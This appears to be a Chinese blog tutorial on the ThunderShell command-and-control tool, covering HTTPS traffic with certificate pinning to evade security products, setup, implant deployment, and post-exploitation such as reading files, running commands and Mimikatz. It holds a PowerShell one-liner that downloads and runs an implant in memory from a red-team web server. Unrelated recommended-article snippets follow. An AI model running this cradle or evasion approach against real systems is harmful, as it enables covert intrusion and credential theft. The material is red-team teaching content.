【基础篇】————15、隐匿攻击之Https

最新推荐文章于 2025-03-12 19:05:32 发布
翻译 最新推荐文章于 2025-03-12 19:05:32 发布 · 681 阅读 · 2

本文介绍了C2工具通信机制及规避方法,重点介绍了基于Python的ThunderShell工具。它用Redis服务器进行HTTPS通信,支持证书锁定绕过安全产品。文中说明了其依赖项、配置、植入执行、shell操作等,还提及它有读取文件、执行命令等功能,可增强Mimikatz工具功能。

C2工具通常依赖于各种协议作为通信机制,如DNS,ICMP,HTTPS等。大多数端点产品执行一些深度数据包检查,以便丢弃任意连接。使用支持加密的协议并使用证书固定生成的流量可以规避大部分产品,并且应该将其视为红队参与过程中的一种方法。

ThunderShellMrUn1k0d3r开发,基于Python。它使用Redis服务器在植入物和服务器之间进行HTTPS通信,并使用PowerShell在目标和任何其他脚本上执行植入。主要优点是支持证书锁定以绕过执行流量检查的安全产品。使用HTTPS作为通信协议和PowerShell的类似工具称为PoshC2

ThunderShell具有以下依赖项:

apt install redis-server
apt install python-redis

default.json文件包含工具配置,通过设置加密密钥并使用证书固定以避免检测,可以启用流量加密。

                                                ThunderShell - 配置

当ThunderShell被执行时,它将启动一个Web服务器,默认情况下将侦听端口8080.Web服务器将处理来自植入物的所有HTTP请求。

植入物(PS-RemoteShell)需要托管在由红队控制的网络服务器上。植入物需要以下参数:

  • IP - Webserver
  • 端口 - Webserver
  • 加密密钥
  • 延迟

以下命令将直接从内存下载并执行植入。

IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.169/tmp/PS-RemoteShell.ps1'); PS-Renoteshell -ip IP地址 -port 端口号 -Key 关键词  -Delay 延迟时间

                                 ThunderShell - 植入式执行

一旦植入物在目标上执行,它将与网络服务器通信并获得新的外壳。

                                          ThunderShell - Shell

每个shell都有自己唯一的ID。可以使用“ list ”命令获取活动shell及其关联ID的列表

                                          ThunderShell - 列出活动shell

在目标上执行任何命令之前,需要与shell进行交互。

ThunderShell还具有读取文件,在内存中执行命令和脚本,文件传输等功能。

                                                 ThunderShell - 读取文件

命令可以像任何其他普通shell一样在目标上执行。

                                                   ThunderShell - 执行命令

由于它使用PowerShell,因此可以执行各种脚本,这些脚本可以增强Mimikatz等工具的功能。

                                                      ThunderShell - Mimikatz执行

可以使用命令刷新检索Mimikatz的结果。

                                                        ThunderShell - Mimikatz

参考

TCP/IP网络江湖——江湖导航(网络层上
朔方鸟的博客
10-07 1502
在本文章中,我们将深入研究网络层的关键概念和技术,包括IP地址、路由、IP协议、数据包转发、子网划分和CIDR表示法。我们将揭示网络层如何像江湖导航一样,将数据包从源头到达目的地,确保它们按照正确的路径旅行。我们将探讨网络层如何处理数据包的引导和选择路由,就如同导航师傅选择最佳的路径一样。
收藏多年的线程安全问题大全笔记(上)——{线程不安全的背后原理},笔记一生一起走,那些日子不再有
mgzdwm的博客
07-23 2695
在并发编程的广阔世界里,有一个隐匿的陷阱,它静静地潜伏在每一个试图并行处理任务的程序之中,那就是线程安全问题。想象一下,当多个线程同时访问并修改同一块内存区域时,犹如多辆马车在狭窄的小道上竞相前行,稍有不慎便可能引发混乱与冲突。本文将带您深入探索线程安全问题的本质,揭示其背后的原理与危害,并为您铺设一条通向安全并发编程的道路。准备好,让我们一起揭开线程安全的面纱,确保您的程序在并发的浪潮中稳健前行。
网络协议系列十五 - HTTPS
1024星球
06-24 1137
HTTPS由网景公司于1994年首次提出。HTTPS是在HTTP的基础上使用SSL/TLS来加密报文,对窃听和中间人攻击提供合理的防护。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8CwE4hWY-1624499299124)(https://blog.idbeny.com/jv2po.png@normal)] 一、HTTPS HTTPS(HyperText Transfer Protocol Secure),超文本传输安全协议。常称为HTTP over TLS、HTT
隐匿攻击行为
weixin_46239998的博客
04-24 1182
攻击行为隐匿
Nginx Https(十五)
董坤的博客
02-06 549
CRL服务器:CA把已经吊销的证书放在这个服务器里面(会一个一个查)性能非常差OCSP就当前一个证书进行查询,这个性能也不高CRL服务器:CA把已经吊销的证书放在这个服务器里面(会一个一个查)性能非常差OCSP就当前一个证书进行查询,这个性能也不高wb服务器nginx支持OCSP的一个开关,如果打开的话,那么nginx服务器,会自动的到OCSP响应程序上查询证书还有多久过期大量客户端访问服务器的时候,nginx就是返回证书,是否有效。Https证书的类型DVOVEV。
http-15-https是什么
FairLikeSnow的博客
10-23 1123
为什么要有 HTTPS? 简单的回答是“因为 HTTP 不安全”。由于 HTTP 天生“明文”的特点,整个传输过程完全透明,任何人都能够在链路中截获、修改或者伪造请求 / 响应报文,数据不具有可信性。 什么是 HTTPSHTTPS 其实是一个“非常简单”的协议,RFC 文档很小,只有短短的 7 页,里面规定了新的协议名“https”,默认端口号 443,至于其他的什么请求 - 应答模式、报文结构、请求方法、URI、头字段、连接管理等等都完全沿用 HTTP,没有任何新的东西。 HTTPS 与 HTTP 最
《黑客攻防从入门到精通:工具》全15章万字深度总结——从工具解析到实战攻防,构建完整网络安全知识体系
最新发布
FFNCL的博客
03-12 2639
本书通过15章系统化教学,不仅传授工具使用,更强调攻防思维的平衡:《黑客攻防从入门到精通:工具》的价值不仅在于工具使用教学,更在于引导读者理解攻防对抗的本质——安全是持续的过程,而非静态的结果。通过系统化工具链的掌握与伦理意识的培养,读者将能够站在防御者的高度,构建主动、动态、纵深的网络安全体系。注:文章对书中的内容还没有详细描述,主要是书中讲解的一些工具在目前来说已经过时或者无法安全下载,所以文章中给出的一些工具都是目前常用的工具。喜欢就点点关注和评论一起进步。
数据的流动——计算机是如何显示一个像素的
像素之间
09-03 1342
本文描述了在计算机内部是怎么把一张照片显示到屏幕上的。一个从编程/输入设备输入到显示器显示到人眼的完整过程。分为几个阶段:(应用程序/输入设备产生)数据与指令——>CPU——>显卡驱动程序——>显卡——>显示器——>人眼。
Python-ThunderShell是基于Powershell的RAT
08-10
ThunderShell是基于Powershell的RAT,依赖于HTTP请求进行通信。 所有的网络流量都使用第二层RC4进行加密,以避免SSL拦截。
15 HTTPS协议详解
weixin_39563769的博客
11-08 368
待后续补充。
渗透测试入门3之隐匿攻击
鹿鸣天涯
04-04 842
渗透测试入门3之隐匿攻击 1. Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icmp/ DNS :https://pentestlab.blog/2017/09/06/command-and-control-dns/ DropBox :https://pentestlab....
内网渗透系列:隐匿攻击方法
闵行小鱼塘
07-26 1730
学习并小结下各种隐匿通道方法
基础】————5、隐匿攻击之DNS
Fly_鹏程万里
05-26 837
隐匿攻击之DNS 即使在最受限制的环境中,也应该允许DNS流量解析内部或外部域。这可以用作目标主机和命令和控制服务器之间的通信通道。命令和数据包含在DNS查询和响应中,因此很难检测,因为任意命令隐藏在合法流量中。 使用Dnscat2可以实现这种技术,Dnscat2可以通过DNS协议创建命令和控制通道。此工具使用基于C的客户端(植入),它需要在目标上执行,以便服务器接收连接。流量以加密形式传输,...
基础】————6、隐匿攻击之DropBox
Fly_鹏程万里
05-26 980
许多公司使用DropBox作为共享工具和托管数据。因此,对DropBox服务器的流量被限制或归类为恶意域是不常见的。但是,有可能滥用DropBox的功能并将其用作命令和控制工具。 这可以通过DropBoxC2工具实现,该工具使用DropBox API在控制器和植入物之间进行通信,因为它完全在内存中运行并且流量被加密,所以它是隐秘的。 DropboxC2控制器的安装简单快捷。 git clo...
基础】————17、隐匿攻击之Website
Fly_鹏程万里
05-26 729
通过合法流量覆盖任意命令是每个红队入侵的必要条件。大多数命令和控制工具正在实施一种秘密技术,它允许红队隐藏他们的活动,因为数据泄露是目标的一部分。 David Kennedy开发了一个名为TrevorC2的命令和控制工具,可用于通过合法的HTTP流量执行命令。需要将trevorc2_server.py上的URL属性修改为所选的网站。 ...
基础】————22、隐匿攻击之Domain Fronting
Fly_鹏程万里
05-27 1975
0x01 简介 最近看到了一些关于Domain Fronting的技术,感觉很有意思,其特点在于,你真正访问的域名并不是你看到的域名,即可以隐藏攻击者的真实地址,并且此技术能够让我们在一些受限制的网络中依然连接到我们的C2服务器,其关键思想是在不同的通信层使用不同的域名,在HTTP(S)请求中,目标域名通常显示在三个关键位置:DNS查询,TLS(SNI)拓展及HTTP主机头中,通常,这三个地方都...
基础】————19、隐匿攻击之WebSocket
Fly_鹏程万里
05-26 977
在探索可以在红队参与期间使用的日常新方法和工具中特别关注命令和控制通道,这些通道可以逃避安全产品,并可以通过使用非传统方法隐藏流量。Arno0x0x发现某些Web网关不检查Web套接字内容。因此,它可以用作向主机执行任意命令的通信通道。 Arno0x0x开发了一个实现此方法的命令和控制工具(WSC2)。该工具是用python编写的,可以用于数据泄露,因为它提供了文件传输功能和shell功能。 ...
手电筒与摩尔斯电码:计算机通信的早期启示
"这内容探讨了在计算机软硬件背后的语言,并通过一个有趣的故事引入了通信的基本原理,特别是摩尔斯电码的应用。" 在计算机软硬件的世界中,隐藏着各种各样的语言和通信方式,这些语言使得设备之间能够互相理解和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值